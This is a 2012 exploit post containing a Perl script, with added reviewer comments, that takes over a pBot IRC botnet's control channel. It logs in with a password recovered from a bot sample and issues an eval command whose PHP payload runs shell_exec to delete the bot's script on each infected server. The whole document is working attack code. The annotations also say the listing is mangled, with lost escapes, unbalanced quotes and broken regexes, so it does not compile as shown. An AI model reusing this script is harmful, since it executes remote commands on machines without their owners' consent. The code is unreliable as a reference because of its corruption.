
pBot Remote Code Execution

Posted on 01 August 2012

#!/usr/bin/perl
# Exploit Title: pBot Remote Code Execution ("*" hostauth)
# Date: 31.07.2012
# Exploit Author: @bwallHatesTwits
# Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack)
# Version: Various versions
# Tested on: Linux 3.2
#
# NOTE(review): this listing is a whitespace-mangled paste. Line breaks have
# been reflowed here for readability only; the code tokens are reproduced as
# shown on the page. Backslash escapes appear to have been dropped by the
# rendering (the $phpEval string below has unbalanced quotes, and several
# regexes contain bare `s+` / `S+` / `Q...E`), so the script will not compile
# in this form. No `use strict` / `use warnings`: every undeclared variable
# ($sel_client, $ircserver, $ircserverpass, $botPass, $botTrigger, $loginCMD,
# $phpEval, $channelCount, %irc_servers, $IRC_cur_socket, $mynick, $fh, $msg,
# $nread, @lines, $line) is a package global.
#
# What it does, as written: a minimal IRC client that joins the bot's control
# channel(s) and, on every JOIN it sees, speaks the bot's login command with
# its configured password followed by an `eval` command carrying PHP. Because
# the targeted pBot build authenticates on the password alone when hostauth is
# "*", the password recovered from a captured bot sample (see Software Link)
# is all the script needs. All received traffic is echoed to stdout.
use IO::Socket;
use IO::Select;
use IO::Socket::INET;
use Socket;

# Identity presented to the IRC server.
my $nickname = "BotSlayer";
my $ident = "BotSlayer";
my $fullname = "BotSlayer";
$sel_client = IO::Select->new();

#configuration values from the bot source
$ircserver = "localhost"; #"server"
$ircserverpass = ""; #"pass"
my $ircport = "6667"; #"port"
#if "key" is set, then add a space and the password to the chan name
my @channels = ("#anonbxu"); #"chan" and "chan2"
$botPass = "hello"; #"password"
$botTrigger = "."; #"trigger"
#hostauth must be "*"
$loginCMD = "user"; #usually user or login
#payload - PHP code to run
#This version deletes the bots originating script, and dies
# NOTE(review): quoting is unbalanced as pasted (escapes lost in rendering).
$phpEval = "shell_exec("rm -f ".$_SERVER['SCRIPT_NAME']);exit();";
# Countdown used by tryQuit(): one decrement per onJoin() call.
$channelCount = scalar(@channels);

# Handler for a JOIN line (dispatched from parse()). Drops the first character
# of the captured channel argument (presumably a leading ':' — confirm against
# the original), sends the login command + password into the channel, waits a
# second, sends the eval command, then counts down toward quitting.
# Caveat: parse() calls this for ANY JOIN line, not just this client's own, so
# each additional join in the channel re-sends the commands and decrements
# $channelCount again. "@BallastSec" inside the double-quoted string
# interpolates an (undeclared, empty) array.
sub onJoin {
    my $channel = shift;
    $channel = substr($channel, 1);
    print "Joined $channel ";
    say($channel, $botTrigger.$loginCMD." $botPass");
    sleep(1);
    say($channel, $botTrigger."eval @BallastSec ".$phpEval);
    print "Payload delivered ";
    tryQuit();
}

# Decrements the global channel counter; once it hits zero, sends QUIT and
# exits the process via quit().
sub tryQuit {
    $channelCount--;
    if($channelCount == 0) {
        quit("whomp wha");
    }
}

# Writes one raw IRC line. Two-argument form: (socket, text); one-argument
# form: text to the current global socket $IRC_cur_socket. The trailing " "
# in the print is presumably a line terminator lost in rendering — confirm.
# `$#_ == '1'` compares numerically; the string literal is harmless but odd.
sub sendraw {
    if ($#_ == '1') {
        my $socket = $_[0];
        print $socket "$_[1] ";
    } else {
        print $IRC_cur_socket "$_[0] ";
    }
}

# Opens a TCP connection to (server, port), registers it with the selector
# and in %irc_servers (keyed by the stringified socket), then sends the IRC
# registration lines. Returns 1 on connect failure (the caller ignores this);
# the defined() check after `or return(1)` is redundant.
# Note: `$mynick` here is a lexical, distinct from the global $mynick that
# parse() and the main loop use.
# Bug (as written): `$ircserverpass != ""` is a numeric comparison, so a
# non-numeric server password compares as 0 != 0 and PASS is never sent.
sub conn {
    my $mynick = $_[0];
    my $ircserver_con = $_[1];
    my $ircport_con = $_[2];
    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
    if (defined($IRC_socket)) {
        $IRC_cur_socket = $IRC_socket;
        $IRC_socket->autoflush(1);
        $sel_client->add($IRC_socket);
        $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
        $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;   # local address of the socket
        if($ircserverpass != "") {
            sendraw("PASS ".$ircserverpass);
        }
        sendraw("NICK ".$mynick);
        sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
        sleep 1;
    }
}

# Dispatches one received IRC line (echoed to stdout first):
#   PING            -> PONG
#   JOIN            -> onJoin() (no check on who joined; see onJoin)
#   PRIVMSG         -> replies to a VERSION query; the second match block only
#                      assigns captures that are never used (dead code)
#   NICK            -> tracks this client's own nick change
#   001 (welcome)   -> records nick/server name and JOINs every channel
# NOTE(review): the `01...01` delimiters look like stripped "\x01" CTCP markers,
# and `s+`, `S+`, `Q$mynickE` look like stripped `\s+`, `\S+`, `\Q$mynick\E` —
# confirm against the original before reading the patterns literally. As
# written, `$mynickE` interpolates an undeclared variable.
sub parse {
    my $servarg = shift;
    print $servarg." ";
    if ($servarg =~ /^PING :(.*)/) {
        sendraw("PONG :$1");
    } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/) {
        my $channel = $4;
        onJoin($channel);
    } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) {
        my $pn=$1;
        my $hostmask= $3;
        my $onde = $4;
        my $args = $5;
        if ($args =~ /^01VERSION01$/) {
            notice("$pn", "01VERSION BotSlayer by Ballast Security01");
        }
        if ($args =~ /^(Q$mynickE|!a)s+(.*)/ ) {
            my $natrix = $1;   # unused
            my $arg = $2;      # unused
        }
    } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i) {
        if (lc($1) eq lc($mynick)) {
            $mynick=$4;
            $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        }
    } elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i) {
        $mynick = $2;
        $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
        foreach(@channels) {
            sendraw("JOIN $_");
        }
    }
}

# Main loop. Behaviour as written:
#  - While no server is registered, conn() is retried with no delay (conn()
#    returns before its sleep on failure), i.e. a tight reconnect spin.
#  - can_read(0) is a non-blocking poll and `next` re-enters the loop
#    immediately, so the process busy-spins while idle.
#  - On a zero-byte read the socket is closed and dropped, but there is no
#    `next`; the split/parse below still runs on whatever $msg holds.
#  - $line_temp is only ever reset to '' and never assigned a partial line, so
#    the line-continuation logic is effectively a no-op; the split pattern and
#    the trailing s/ $// are presumably "\n" handling with the escape lost.
my $line_temp;
while(1) {
    while (!(keys(%irc_servers))) {
        conn($nickname, $ircserver, $ircport);
    }
    delete($irc_servers{''}) if (defined($irc_servers{''}));
    my @ready = $sel_client->can_read(0);
    next unless(@ready);
    foreach $fh (@ready) {
        $IRC_cur_socket = $fh;
        $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
        $nread = sysread($fh, $msg, 4096);
        if ($nread == 0) {
            $sel_client->remove($fh);
            $fh->close;
            delete($irc_servers{$fh});
        }
        @lines = split (/ /, $msg);
        $msg =~ s/ $//;
        for(my $c=0; $c<= $#lines; $c++) {
            $line = $lines[$c];
            $line=$line_temp.$line if ($line_temp);
            $line_temp='';
            $line =~ s/ $//;
            parse("$line");
        }
    }
}

# PRIVMSG helper: (target, text). Silently does nothing unless exactly two
# arguments are given. (Shares its name with the `say` feature, which is not
# enabled here, so this user sub is what gets called.)
sub say {
    return unless $#_ == 1;
    sendraw("PRIVMSG $_[0] :$_[1]");
}

# NOTICE helper: (target, text); same two-argument guard as say().
sub notice {
    return unless $#_ == 1;
    sendraw("NOTICE $_[0] :$_[1]");
}

# JOIN helper; not called anywhere in this listing (and its name collides
# with the builtin join).
sub join {
    sendraw("JOIN $_[0]");
}

# PART helper; not called anywhere in this listing.
sub part {
    sendraw("PART $_[0]");
}

# Sends QUIT with the given message and terminates the process.
sub quit {
    sendraw("QUIT :$_[0]");
    exit;
}

 
